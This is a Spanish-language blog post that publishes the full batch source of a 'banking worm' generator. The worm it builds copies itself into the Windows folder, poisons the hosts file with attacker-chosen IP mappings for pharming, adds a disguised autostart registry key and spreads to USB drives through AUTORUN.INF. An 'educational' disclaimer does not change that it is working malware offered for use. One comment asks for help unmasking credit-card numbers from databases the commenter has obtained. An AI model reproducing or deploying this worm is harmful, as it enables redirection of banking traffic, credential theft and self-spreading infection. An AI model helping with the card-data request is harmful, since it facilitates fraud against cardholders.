| Mobile| RSS

Generador de Gusano bancario ( Pharming ) Batch

domingo, 28 de diciembre de 2008 | Tags: | 6 Comentarios

Código fuente de un generador de worm (gusano) programado en batch que envenena el archivo Host para realizar suplantaciones de IP ( Pharming ) además de contar con propagación de medios extraíbles ( Pendrives USB )

Código 100% Educativo para demostrar únicamente la facilidad en que un atacante puede afectarnos realizando este tipo de técnicas en nuestra contra.

@echo off
setlocal EnableDelayedExpansion
color A
cls
title b4nking-w0rm by Octalh [ www.aztekmindz.org ]
echo.
echo.
echo [+]====================[ b4nking-worm ]====================[+]
echo _ _ __ __ _ _
echo /\ ^| ^| ^| ^| ^| \/ ^(_^) ^| ^|
echo / \ ___^| ^|_ ___^| ^| __ ^| \ / ^|_ _ __ __^| ^|____
echo / /\ \ ^|_ / __/ _ \ ^|/ / ^| ^|\/^| ^| ^| ‘_ \ / _` ^|_ /
echo / ____ \ / /^| ^|^| __/ ^< ^| ^| ^| ^| ^| ^| ^| ^| (_^| ^|/ /
echo /_/ \_\/___^|\__\___^|_^|\_\ ^|_^| ^|_^|_^|_^| ^|_^|\__,_/___^|
echo.
echo www.aztekmindz.org octalh@gmail.com
echo.
echo - Generador de Gusano bancario ^( Pharming ^) Batch
echo - Testeado XP SP2
echo - Programado con fines educativos
echo - El autor no se hace responsable de
echo usos malintencionados.
echo.
echo [+]====================[ b4nking-worm ]====================[+]
echo.
echo.
echo.
set /P nombre= [1] Ingrese nombre del gusano:
::header
echo @echo off >%nombre%.bat
echo :: + [ b4nking-worm ] + >>%nombre%.bat
echo :: www.aztekmindz.org octalh@gmail.com >>%nombre%.bat
echo :: - Generador Gusano bancario - >>%nombre%.bat
::copiado
echo COPY %%0 "%WINDIR%\%nombre%.bat" >>%nombre%.bat
echo.
set /P ch= [2] Ingrese cantidad de hosts a ingresar:
echo.
echo [3] Ingrese la IP y el host separados por un espacio:
echo Ejemplo: 127.0.0.1 localhost
echo.

echo SET htxt=C:\WINDOWS\system32\drivers\etc\hosts >>%nombre%.bat
echo IF EXIST %%htxt%% ( >>%nombre%.bat
echo echo # [+]====[ b4nking w0rm by octalh ]====[+] ^>^>%%htxt%% >>%nombre%.bat

FOR /L %%i IN (1,1,%ch%) DO (
::Host
echo [ Almacenando Host %%i de %ch% ]
set /P hs= Host:
echo echo !hs! ^>^>%%htxt%% >>%nombre%.bat
)
echo echo # [+]====[ b4nking w0rm by octalh ]====[+] ^>^>%%htxt%% >>%nombre%.bat
echo ) >>%nombre%.bat
echo ipconfig /flushdns >>%nombre%.bat
echo.
set /p ai= [4] Activar Autoinicio? S/N:
if %ai%==s (
::Autoinicio
echo REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuaclt.exe /t REG_SZ /d "%WINDIR%\%nombre%.bat" /f >> %nombre%.bat
)
echo.
set /p usb= [5] Activar Propagacion USB? S/N:
if %usb%==s (
::USB
echo :inicio >>%nombre%.bat
echo FOR %%%%A IN ^(D F G H I J K L M N O P Q R S T U V W X Y Z^) DO CALL :verificar %%%%A >>%nombre%.bat
echo GOTO :EOF >>%nombre%.bat
echo :verificar >>%nombre%.bat
echo IF EXIST "%%1:" ^(CALL :copiado %%1^) >>%nombre%.bat
echo GOTO :EOF >>%nombre%.bat
echo :copiado >>%nombre%.bat
echo COPY %nombre%.bat "%%1:\145782.bat" >>%nombre%.bat
echo echo [AUTORUN] ^> "%%1:\AUTORUN.INF" >>%nombre%.bat
echo echo shell\1=abrir ^>^>"%1:\AUTORUN.INF" >>%nombre%.bat
echo echo shell\1\Command="%nombre%.bat" ^>^>"%%1:\AUTORUN.INF" >>%nombre%.bat
echo echo shell\2=explorar ^>^>"%%1:\AUTORUN.INF" >>%nombre%.bat
echo echo shell\2\Command="%nombre%.bat" ^>^>"%%1:\AUTORUN.INF" >>%nombre%.bat
echo echo shellexecute= "\%nombre%.bat" ^>^>"%%1:\AUTORUN.INF" >>%nombre%.bat
echo ping -n 10 localhost >>%nombre%.bat
echo GOTO :inicio >>%nombre%.bat
)
echo.
echo [+]====================[ b4nking-worm ]====================[+]
echo.
echo [OK] Gusano editado con exito
echo.
echo Presione cualquier tecla para salir
echo.
echo +-+-+-+-+-+ +-+-+-+-+-+
echo ^|A^|z^|t^|e^|k^| ^|M^|i^|n^|d^|z^|
echo +-+-+-+-+-+ +-+-+-+-+-+
echo - www.aztekmindz.org ^| octalh@gmail.com -
echo.
echo [+]====================[ b4nking-worm ]====================[+]
echo.
echo.
pause>nul

6 Respondiendo
gravatar
darkss
on 29 de diciembre de 2008, 2:15  

hola soy darkss , tengo un problema, tengo algunas bases de datos que consegui en acces compras.mdb pagos.mdb etc, el tema es que cuando voy a la pestaña payment donde estan registradas toas las compras que se hicieron con tarjeta y donde estan todos los datos de tarjetas ,no puedo ver el numero completo de cada tarjeta osea se ve solo los ultimos numeros y los demas estan tapados o ocultos por una especie de asteriscos, por lo que quedan de esta manera ***********72163 todos los emas datos de la tarjeta estan visibles este es el unico problema solo el numero de la tarjeta, no se si me explico bien... te pido que si sabes algo con respecto a esto me des una mano o me orientes como puedo hace , mi coreeo es darkss@live.com.ar desde ya gracias y saludos.

gravatar
Anónimo
on 8 de diciembre de 2010, 6:31  

Hola, muy interesante el articulo, muchos saludos desde Chile!

gravatar
Anónimo
on 8 de diciembre de 2010, 6:33  

Hola, muy interesante el post, felicitaciones desde Argentina!

gravatar
Anónimo
on 8 de diciembre de 2010, 6:37  

Hola, muy interesante el post, saludos desde Panama!

gravatar
Anónimo
on 9 de diciembre de 2010, 7:43  

Buen articulo, estoy de acuerdo contigo aunque no al 100%:)

gravatar
Anónimo
on 9 de diciembre de 2010, 7:45  

Buen articulo, estoy de acuerdo contigo aunque no al 100%:)

Publicar un comentario

Ciber Protesta

Blog Archive

Labels

Blogumulus by Roy Tanck and Amanda Fazani

Twitter